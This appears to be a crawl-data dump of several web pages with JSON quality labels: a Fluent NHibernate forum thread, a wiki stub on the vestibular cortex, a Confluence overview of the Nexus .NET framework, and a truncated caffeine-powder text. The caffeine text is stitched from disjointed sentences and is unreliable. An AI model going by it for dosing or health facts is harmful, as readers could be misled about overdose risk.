"primary": {
"code": "1",
"label": "Factual"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "14",
"label": "Reviews/Critiques"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "24",
"label": "User Review"
}
},
"reasoning_depth": {
"primary": {
"code": "1",
"label": "No Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "6",
"label": "Not Applicable/Indeterminate"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "1",
"label": "General Audience"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-3,584,846,317,690,271,000
|
1 Replies - 1650 Views - Last Post: 13 September 2011 - 03:25 PM Rate Topic: -----
#1 h4nnib4l Icon User is offline
• The Noid
• member icon
Reputation: 1193
• View blog
• Posts: 1,710
• Joined: 24-August 11
Fluent NHibernate use object as attribute?
Posted 13 September 2011 - 01:53 PM
I'm new to Fluent NHibernate (or to ORMs in general for that matter), and I'm in a philosophical standstill (okay, maybe that's a BIT dramatic)...
I'm writing a module that will allow a manager to delegate reports to his or her direct reports. Managers and Delegates are both instances of Employee:
public class Employee : IPersistable
{
public virtual string EmployeeId { get; set; }
public virtual DateTime AsOfDate { get; set; }
public virtual string FirstName { get; set; }
public virtual string Middle { get; set; }
public virtual string LastName { get; set; }
public virtual string CompanyNumber { get; set; }
public virtual string JobNumber { get; set; }
public virtual string JobTitle { get; set; }
public virtual string Division { get; set; }
public virtual DateTime EmploymentDate { get; set; }
public virtual SupportingData Rate { get; set; }
public virtual SupportingData Status { get; set; }
public virtual int SalaryGrade { get; set; }
public virtual string Email { get; set; }
public virtual string SupervisorId { get; set; }
public virtual string UserName { get; set; }
public virtual IList<Employee> Employees { get; set; }
}
The ReportDelegation table has a ManagerId, DelegateId, ReportId, and DateCreated.
My conundrum is whether, in my fluent ReportDelegation class, to go with:
public class ReportDelegation : IPersistable
{
public virtual Employee Manager { get; set; }
public virtual Employee Recipient { get; set; }
public virtual ReportInfo ReportInfo { get; set; }
public virtual DateTime CreateDate { get; set; }
}
OR...
public class ReportDelegation : IPersistable
{
public virtual string ManagerId { get; set; }
public virtual string RecipientId { get; set; }
public virtual int ReportId { get; set; }
public virtual DateTime CreateDate { get; set; }
}
I would rather do it the first way, so that I can pass the entire object around and pull attributes as needed. However, I don't know how to set up the mapping between the defined attributes and the DB columns. The lure of the second method is that all I need is:
public class ReportDelegationMap : ClassMap<ReportDelegation>
{
public ReportDelegationMap()
{
CompositeId()
.KeyProperty(x => x.ManagerId, "Manager_EmpId")
.KeyProperty(x => x.RecipientId, "Delegate_EmpId")
.KeyProperty(x => x.ReportId, "ReportID");
Map(x => x.CreateDate)
.Column("DateCreated");
}
}
Again, I feel like the first way, using object instances, is the better way to do it. If so, how do I map to my DB table?
Is This A Good Question/Topic? 0
• +
Replies To: Fluent NHibernate use object as attribute?
#2 h4nnib4l Icon User is offline
• The Noid
• member icon
Reputation: 1193
• View blog
• Posts: 1,710
• Joined: 24-August 11
Re: Fluent NHibernate use object as attribute?
Posted 13 September 2011 - 03:25 PM
Well, I'm an idiot.
public ReportDelegationMap()
{
CompositeId()
.KeyProperty(x => x.Manager.EmployeeId, "Manager_EmpId")
.KeyProperty(x => x.Recipient.EmployeeId, "Delegate_EmpId")
.KeyProperty(x => x.ReportInfo.Id, "ReportID");
Map(x => x.CreateDate)
.Column("DateCreated");
}
It helps if you use the object's attribute name, in case any of you were wondering... If intellisense likes it, then so do I!
Now I just have to teach the web service what an Employee is... :/
Was This Post Helpful? 0
• +
• -
Page 1 of 1
|
{
"url": "http://www.dreamincode.net/forums/topic/247038-fluent-nhibernate-use-object-as-attribute/",
"source_domain": "www.dreamincode.net",
"snapshot_id": "crawl=CC-MAIN-2016-26",
"warc_metadata": {
"Content-Length": "70026",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:MZ3R4WWCSP3YQWETC5ZZIDBIK7JE77LH",
"WARC-Concurrent-To": "<urn:uuid:eebf9da8-3458-4961-bfec-b2d7d0e71183>",
"WARC-Date": "2016-06-30T12:15:12Z",
"WARC-IP-Address": "104.28.19.152",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:NP2B73RZEWUHNKUXAKZYPM5F7RBPYIA7",
"WARC-Record-ID": "<urn:uuid:bb145fc4-e27e-49fd-9b84-0efd78b72321>",
"WARC-Target-URI": "http://www.dreamincode.net/forums/topic/247038-fluent-nhibernate-use-object-as-attribute/",
"WARC-Truncated": "length",
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:d3856f69-39af-4d1c-9903-57f288dbed13>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-164-35-72.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2016-26\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for June 2016\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
1,
84,
85,
119,
120,
133,
149,
150,
167,
181,
198,
223,
224,
267,
268,
304,
305,
452,
453,
605,
642,
648,
703,
758,
812,
863,
916,
974,
1028,
1081,
1134,
1195,
1252,
1311,
1364,
1414,
1471,
1524,
1587,
1593,
1594,
1595,
1596,
1679,
1680,
1754,
1800,
1806,
1860,
1916,
1975,
2032,
2038,
2039,
2040,
2041,
2047,
2092,
2098,
2152,
2208,
2258,
2315,
2321,
2322,
2323,
2324,
2587,
2649,
2655,
2692,
2702,
2728,
2792,
2859,
2918,
2953,
2993,
3003,
3009,
3010,
3011,
3012,
3134,
3135,
3168,
3174,
3175,
3230,
3231,
3265,
3266,
3279,
3295,
3296,
3313,
3327,
3344,
3369,
3370,
3417,
3418,
3454,
3455,
3475,
3504,
3514,
3540,
3613,
3689,
3753,
3788,
3828,
3838,
3839,
3840,
3841,
3967,
3968,
4035,
4060,
4066,
4072,
4073
],
"line_end_idx": [
1,
84,
85,
119,
120,
133,
149,
150,
167,
181,
198,
223,
224,
267,
268,
304,
305,
452,
453,
605,
642,
648,
703,
758,
812,
863,
916,
974,
1028,
1081,
1134,
1195,
1252,
1311,
1364,
1414,
1471,
1524,
1587,
1593,
1594,
1595,
1596,
1679,
1680,
1754,
1800,
1806,
1860,
1916,
1975,
2032,
2038,
2039,
2040,
2041,
2047,
2092,
2098,
2152,
2208,
2258,
2315,
2321,
2322,
2323,
2324,
2587,
2649,
2655,
2692,
2702,
2728,
2792,
2859,
2918,
2953,
2993,
3003,
3009,
3010,
3011,
3012,
3134,
3135,
3168,
3174,
3175,
3230,
3231,
3265,
3266,
3279,
3295,
3296,
3313,
3327,
3344,
3369,
3370,
3417,
3418,
3454,
3455,
3475,
3504,
3514,
3540,
3613,
3689,
3753,
3788,
3828,
3838,
3839,
3840,
3841,
3967,
3968,
4035,
4060,
4066,
4072,
4073,
4084
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 4084,
"ccnet_original_nlines": 124,
"rps_doc_curly_bracket": 0.015181190334260464,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.20676691830158234,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.02506265975534916,
"rps_doc_frac_lines_end_with_ellipsis": 0.01600000075995922,
"rps_doc_frac_no_alph_words": 0.37719297409057617,
"rps_doc_frac_unique_words": 0.39840635657310486,
"rps_doc_mean_word_length": 5.348605632781982,
"rps_doc_num_sentences": 37,
"rps_doc_symbol_to_word_ratio": 0.007518799975514412,
"rps_doc_unigram_entropy": 4.721720218658447,
"rps_doc_word_count": 502,
"rps_doc_frac_chars_dupe_10grams": 0.11247672140598297,
"rps_doc_frac_chars_dupe_5grams": 0.3702048361301422,
"rps_doc_frac_chars_dupe_6grams": 0.19664804637432098,
"rps_doc_frac_chars_dupe_7grams": 0.1445065140724182,
"rps_doc_frac_chars_dupe_8grams": 0.1445065140724182,
"rps_doc_frac_chars_dupe_9grams": 0.11247672140598297,
"rps_doc_frac_chars_top_2gram": 0.12104283273220062,
"rps_doc_frac_chars_top_3gram": 0.09832402318716049,
"rps_doc_frac_chars_top_4gram": 0.15567970275878906,
"rps_doc_books_importance": -370.7189025878906,
"rps_doc_books_importance_length_correction": -370.7189025878906,
"rps_doc_openwebtext_importance": -233.0050811767578,
"rps_doc_openwebtext_importance_length_correction": -233.0050811767578,
"rps_doc_wikipedia_importance": -129.76669311523438,
"rps_doc_wikipedia_importance_length_correction": -129.76669311523438
},
"fasttext": {
"dclm": 0.18832463026046753,
"english": 0.7312758564949036,
"fineweb_edu_approx": 2.9940130710601807,
"eai_general_math": 0.10304492712020874,
"eai_open_web_math": 0.14804166555404663,
"eai_web_code": 0.24576693773269653
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.4",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "5",
"label": "Social/Forum"
},
"secondary": {
"code": "4",
"label": "Code/Software"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "18",
"label": "Q&A Forum"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
3,752,950,894,225,605,600
|
Wikia
Psychology Wiki
Vestibular cortex
Talk0
34,190pages on
this wiki
Assessment | Biopsychology | Comparative | Cognitive | Developmental | Language | Individual differences | Personality | Philosophy | Social |
Methods | Statistics | Clinical | Educational | Industrial | Professional items | World psychology |
Biological: Behavioural genetics · Evolutionary psychology · Neuroanatomy · Neurochemistry · Neuroendocrinology · Neuroscience · Psychoneuroimmunology · Physiological Psychology · Psychopharmacology (Index, Outline)
Brain: Vestibular cortex
Gray731
The insula of the left side, exposed by removing the opercula. (Image is of left side, but there is some evidence that there may be right-sided dominance.)
[[Image:|250px|center|]]
Latin '
Gray's subject #
Part of
Components
Artery
Vein
BrainInfo/UW ancil-469
MeSH [1]
Vestibular cortex is the portion of the cerebrum which responds to input from the vestibular system.[1]
The location is not well defined, but some research indicates a right hemisphere dominance.[2]
Lesions of the vestibular nucleus impair function.[3]
The "temporo-peri-Sylvian vestibular cortex" (TPSVC) has been proposed as an analog to parietoinsular vestibular cortex found in monkeys.[4]
ReferencesEdit
1. Duque-Parra JE (September 2004). Perspective on the vestibular cortex throughout history. Anat Rec B New Anat 280 (1): 15–9.
2. Philbeck JW, Behrmann M, Biega T, Levy L (2006). Asymmetrical perception of body rotation after unilateral injury to human vestibular cortex. Neuropsychologia 44 (10): 1878–90.
3. Dieterich M, Bense S, Stephan T, Brandt T, Schwaiger M, Bartenstein P (April 2005). Medial vestibular nucleus lesions in Wallenberg's syndrome cause decreased activity of the contralateral vestibular cortex. Ann. N. Y. Acad. Sci. 1039: 368–83.
4. Kahane P, Hoffmann D, Minotti L, Berthoz A (November 2003). Reappraisal of the human vestibular cortex by cortical electrical stimulation study. Ann. Neurol. 54 (5): 615–24.
|}
This page uses Creative Commons Licensed content from Wikipedia (view authors).
}}
Around Wikia's network
Random Wiki
|
{
"url": "http://psychology.wikia.com/wiki/Vestibular_cortex",
"source_domain": "psychology.wikia.com",
"snapshot_id": "crawl=CC-MAIN-2015-18",
"warc_metadata": {
"Content-Length": "76640",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:OJ3MCEPCCGAVKQQUHMQTHECCRGDIVOLJ",
"WARC-Concurrent-To": "<urn:uuid:6fd038c9-9126-4761-a450-87c1da0004e0>",
"WARC-Date": "2015-04-25T06:58:24Z",
"WARC-IP-Address": "23.235.46.194",
"WARC-Identified-Payload-Type": null,
"WARC-Payload-Digest": "sha1:XCGHR6WLABD2OFT6335EV2A7UZR62KRU",
"WARC-Record-ID": "<urn:uuid:13409927-5bed-4e6e-9430-31880826fe3d>",
"WARC-Target-URI": "http://psychology.wikia.com/wiki/Vestibular_cortex",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:35a806e3-e202-4cfd-a320-2923d4872a2c>"
},
"warc_info": "robots: classic\r\nhostname: ip-10-235-10-82.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2015-18\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web for April 2015\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf"
}
|
{
"line_start_idx": [
0,
6,
7,
23,
24,
42,
43,
49,
64,
74,
75,
218,
319,
320,
536,
537,
538,
563,
571,
727,
752,
760,
777,
785,
796,
803,
808,
831,
840,
841,
945,
946,
1041,
1042,
1096,
1097,
1238,
1239,
1254,
1255,
1385,
1567,
1816,
1995,
1996,
1997,
2000,
2001,
2081,
2084,
2085,
2108,
2109
],
"line_end_idx": [
6,
7,
23,
24,
42,
43,
49,
64,
74,
75,
218,
319,
320,
536,
537,
538,
563,
571,
727,
752,
760,
777,
785,
796,
803,
808,
831,
840,
841,
945,
946,
1041,
1042,
1096,
1097,
1238,
1239,
1254,
1255,
1385,
1567,
1816,
1995,
1996,
1997,
2000,
2001,
2081,
2084,
2085,
2108,
2109,
2120
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 2120,
"ccnet_original_nlines": 52,
"rps_doc_curly_bracket": 0.0014150900533422828,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.1463414579629898,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.04878048971295357,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.36341461539268494,
"rps_doc_frac_unique_words": 0.7204301357269287,
"rps_doc_mean_word_length": 5.982079029083252,
"rps_doc_num_sentences": 31,
"rps_doc_symbol_to_word_ratio": 0.0024390199687331915,
"rps_doc_unigram_entropy": 5.0390729904174805,
"rps_doc_word_count": 279,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.08627921342849731,
"rps_doc_frac_chars_top_3gram": 0.02516476996243,
"rps_doc_frac_chars_top_4gram": 0,
"rps_doc_books_importance": -174.98846435546875,
"rps_doc_books_importance_length_correction": -174.98846435546875,
"rps_doc_openwebtext_importance": -127.89974212646484,
"rps_doc_openwebtext_importance_length_correction": -127.89974212646484,
"rps_doc_wikipedia_importance": -85.8570785522461,
"rps_doc_wikipedia_importance_length_correction": -85.8570785522461
},
"fasttext": {
"dclm": 0.04503273963928223,
"english": 0.6677458882331848,
"fineweb_edu_approx": 2.6438443660736084,
"eai_general_math": 0.010482129640877247,
"eai_open_web_math": 0.20328402519226074,
"eai_web_code": 0.0005149199860170484
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "612.822",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Physiology"
}
},
"secondary": {
"code": "612.82",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Physiology"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "2",
"label": "Academic/Research"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "4",
"label": "Missing Images or Figures"
},
"secondary": {
"code": "0",
"label": "No missing content"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "3",
"label": "Academic Writing"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "2",
"label": "High School Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-8,375,661,289,126,503,000
|
Dashboard > OverDrive > Home > Gist
Gist
Added by Ted Husted, last edited by Ted Husted on Nov 04, 2005 (view change)
Labels:
(None)
The OverDrive project is constructing a set of realistic "best practice" applications for the Nexus framework.
Nexus Framework
At a Glance
Presentation Layer ASP.Net Spring.Web Nexus ViewControl Nexus ViewHelper (View)
Application Layer Spring.Net Nexus Catalog Nexus Commands Nexus Contexts (Controller)
Persistence Layer iBATIS.Net DataMaps Database Web Services (Model)
The Nexus framework exposes the application layer to the presentation layer through one or more Helper objects. The Helpers are a facade. A ViewControl base class works with the Helpers to read values from the controls, invoke the application logic, and determine the result. The result may include error messages, a set of values, or a list of values – all ready to display.
By "ready to display", we mean that all the type conversions, text formatting, and localizations have already been done. The UI controls can wrap the text in markup without additional post-processing. Providing ready-to-display text is an essential feature, since Nexus is designed to be used with multiple presentation layers. And, yes, we do consider unit tests to be a presentation layer!
Nexus does not replace presentation frameworks like ASP.NET or Struts. Nexus provides the missing link between presentation frameworks and the business logic that drives your application.
The Nexus back-end is an extended version of the Commons Chain of Responsibility (CoRe). Our Agility product is a port of the original Jakarta Commons CoRe codebase. The Nexus product is our extension to Agility. Nexus adds the features we need to use a Chain of Responsiblity as a business facade.
"Chain of Responsibility pattern"
"Avoid coupling the sender of a request to its receivere by giving more than one object a chance to handle the request. Chain the receiving objects and pass the request along the chain until an object handles it."
Design Patterns by Gamma, Helm, Johnson, and Vlissides (ISBN 0201633612).
The Nexus extensions to Agility feature an advanced Context with attributes common to most applications. There are attributes for storing an Exception, lists of Errors, and lists of generic Messages (Fault, Alerts, and Hints). A convenient "IsNominal" property tells us if there are Alerts or a Fault to display.
Nexus Catalog
The Nexus Catalog makes it easy to retrieve a Context and Command in one call. The caller can pass a Command ID and get back a Context with the Command embedded as an attribute. After filling the Context with values, we can "execute" the Context. The Catalog retrieves the Command, and then passes the Context to its Command. For populating a page, we can also ask for a Command ID, and get back the Context after the Command has executed, in a single call.
Nexus Context
The Context provides a "Criteria" attribute, which is used like a sandbox to store input and output values. The Helpers utilize the Criteria rather than the Context. Other framework Commands automatically convert or format the values between the Criteria and Context.
Request Processing
The Nexus Catalog is extended so that we can execute any given Command as part of a larger Chain of Commands. At runtime, the Catalog creates a Chain and wraps "pre-opt" and "post-op" chains around the instant Command (which could also be a Chain). The pre-op and post-opt chains are configured along with other Commands in the Catalog. In effect, the Catalog creates a "Back Controller" to ensure certain things always happen on each request (Command invocation). The pre-opt Chain, instant Command (or Chain), and post-op Chain work as a request processor.
The standard pre-op Chain converts input, and the standard post-op Chain formats output. But we can also do things like link a logger into the post-op Chain. It's very much like the way Subversion uses pre-commit and post-commit triggers, except that the "commit" is a Command.
Nexus Processors
Pluggable Processors handle the conversion and/or formatting for a kind of field. The "kind" might be a data type, like "integer", or a formatting type, like "telephone number", a combination of both, or even a calculated attribute.
The Processors are linked to a Field Table. Each field that needs special handling can be listed in the Field Table and associated with a Processor. The Field Table and Processors also contain the message templates that are used to create validation errors. For lists returned from a database, a special Processor can iterate over each row of the list, and call the Processor for each column, to create a formatted version in the Critiera.
Input and Output
When listing a Command in the Catalog, we can also list the input and output values the command expects. Input can be specified as "required" or as "related". A Chain automatically aggregates the input field list from its Commands, to insure that all required input is provided. We can also specify a command's output values, and the Chain will consider the output from one command valid input to a subsequent command.
The Helpers use the Command's list of input fields to to automatically read or bind values to the controls. The standard pre-op Chain also uses the field list and Field Table to generate validation errors.
Form Binding and Reading
Most often, you can read or bind an entire form with a single line of code. A complete block, including error checking, may take four or five lines.
Binding
Here is a typical idiom for populating a form:
IViewHelper helper = ExecuteBind(FIND_COMMAND);
bool okay = helper.IsNominal;
if (!okay) Page_Alert = helper;
Reading
Here is a typical idiom for reading input from a form:
IViewHelper helper = ReadExecute(SAVE_COMMAND);
bool okay = helper.IsNominal;
if (!okay) Page_Alert = helper;
For more about Nexus, see the WhitePaper page and PhoneBook application.
OVR-2@OVR-JIRA
Site running on a free Atlassian Confluence Open Source Project License granted to OSS. Evaluate Confluence today.
Powered by Atlassian Confluence, the Enterprise Wiki. (Version: 2.5.5 Build:#811 Jul 25, 2007) - Bug/feature request - Contact Administrators
|
{
"url": "http://www.apachebookstore.com/confluence/oss/display/OVR/Gist",
"source_domain": "www.apachebookstore.com",
"snapshot_id": "crawl=CC-MAIN-2018-34",
"warc_metadata": {
"Content-Length": "21272",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:SO2AIKT5RZIHMGMMGJTILRR7DCQWVXHL",
"WARC-Concurrent-To": "<urn:uuid:12c0373d-3d57-427a-876c-a40a6d4458e1>",
"WARC-Date": "2018-08-17T15:41:59Z",
"WARC-IP-Address": "85.17.231.175",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:DJQMEVMDTNDA4TNF3EEXNN3KJRXYD5SU",
"WARC-Record-ID": "<urn:uuid:8dc8eea5-187b-4314-814a-6d75699c202f>",
"WARC-Target-URI": "http://www.apachebookstore.com/confluence/oss/display/OVR/Gist",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:432e7596-4a58-4cea-af4d-f8696e074c0a>"
},
"warc_info": "isPartOf: CC-MAIN-2018-34\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for August 2018\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-138-84-135.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
38,
43,
121,
130,
137,
138,
139,
250,
251,
267,
268,
280,
360,
446,
514,
515,
891,
892,
1284,
1285,
1473,
1474,
1773,
1774,
1808,
1809,
2023,
2024,
2098,
2099,
2412,
2413,
2427,
2428,
2886,
2887,
2901,
2902,
3170,
3171,
3190,
3191,
3750,
3751,
4029,
4030,
4047,
4048,
4281,
4282,
4722,
4723,
4740,
4741,
5160,
5161,
5367,
5368,
5393,
5394,
5543,
5544,
5552,
5553,
5600,
5601,
5649,
5683,
5719,
5720,
5728,
5729,
5784,
5785,
5833,
5867,
5903,
5904,
5977,
5978,
5979,
5994,
5995,
5996,
6111
],
"line_end_idx": [
38,
43,
121,
130,
137,
138,
139,
250,
251,
267,
268,
280,
360,
446,
514,
515,
891,
892,
1284,
1285,
1473,
1474,
1773,
1774,
1808,
1809,
2023,
2024,
2098,
2099,
2412,
2413,
2427,
2428,
2886,
2887,
2901,
2902,
3170,
3171,
3190,
3191,
3750,
3751,
4029,
4030,
4047,
4048,
4281,
4282,
4722,
4723,
4740,
4741,
5160,
5161,
5367,
5368,
5393,
5394,
5543,
5544,
5552,
5553,
5600,
5601,
5649,
5683,
5719,
5720,
5728,
5729,
5784,
5785,
5833,
5867,
5903,
5904,
5977,
5978,
5979,
5994,
5995,
5996,
6111,
6252
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 6252,
"ccnet_original_nlines": 85,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.33252033591270447,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.013821139931678772,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.1788617968559265,
"rps_doc_frac_unique_words": 0.39289340376853943,
"rps_doc_mean_word_length": 5.045685291290283,
"rps_doc_num_sentences": 67,
"rps_doc_symbol_to_word_ratio": 0.0008130099740810692,
"rps_doc_unigram_entropy": 5.235623359680176,
"rps_doc_word_count": 985,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.04386318102478981,
"rps_doc_frac_chars_dupe_6grams": 0.034607648849487305,
"rps_doc_frac_chars_dupe_7grams": 0.017706239596009254,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.011267609894275665,
"rps_doc_frac_chars_top_3gram": 0.007243460044264793,
"rps_doc_frac_chars_top_4gram": 0.0052313897758722305,
"rps_doc_books_importance": -550.19091796875,
"rps_doc_books_importance_length_correction": -550.19091796875,
"rps_doc_openwebtext_importance": -283.95745849609375,
"rps_doc_openwebtext_importance_length_correction": -283.95745849609375,
"rps_doc_wikipedia_importance": -189.22518920898438,
"rps_doc_wikipedia_importance_length_correction": -189.22518920898438
},
"fasttext": {
"dclm": 0.09809994697570801,
"english": 0.8370673060417175,
"fineweb_edu_approx": 2.393742799758911,
"eai_general_math": 0.5654321908950806,
"eai_open_web_math": 0.19238388538360596,
"eai_web_code": 0.6141406297683716
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.1",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "005.452",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "10",
"label": "Knowledge Article"
}
},
"reasoning_depth": {
"primary": {
"code": "3",
"label": "Intermediate Reasoning"
},
"secondary": {
"code": "2",
"label": "Basic Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "3",
"label": "Undergraduate Level"
},
"secondary": {
"code": "4",
"label": "Graduate/Expert Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
6,067,267,069,227,997,000
|
what is caffeine powder
Customer reviews on sales sites are quick to warn of how easy it is to mistakenly use too much of the powder. For about $10, you can buy 100,000 milligrams of caffeine powder online. [27], Caffeine overdoses are uncommon, but caffeine poisoning is possible with amounts over 1 gram. “The public does not realize the caffeine content present in these products and the risk associated with ingestion of even small quantities,” says Chris Holstege, MD, director of toxicology and assistant professor at the University of Virginia School of Medicine. Powdered caffeine is caffeine in this pure form, and as a supplement it is most commonly used to increase mental alertness and counteract fatigue. [24] It also binds to phosphodiesterase receptors, which causes widening of blood vessels and breakdown of fat. Caffeine anhydrous is dehydrated caffeine in the form of crystallized powder and is highly concentrated. It's caffeine in powder form. At certain doses, caffeine in any form can be addictive, and in large doses it can cause serious side effects, such as … But caffeine powder, available over the Internet, also poses a threat of misuse. But man-made caffeine is also added to energy drinks and sold as powder or 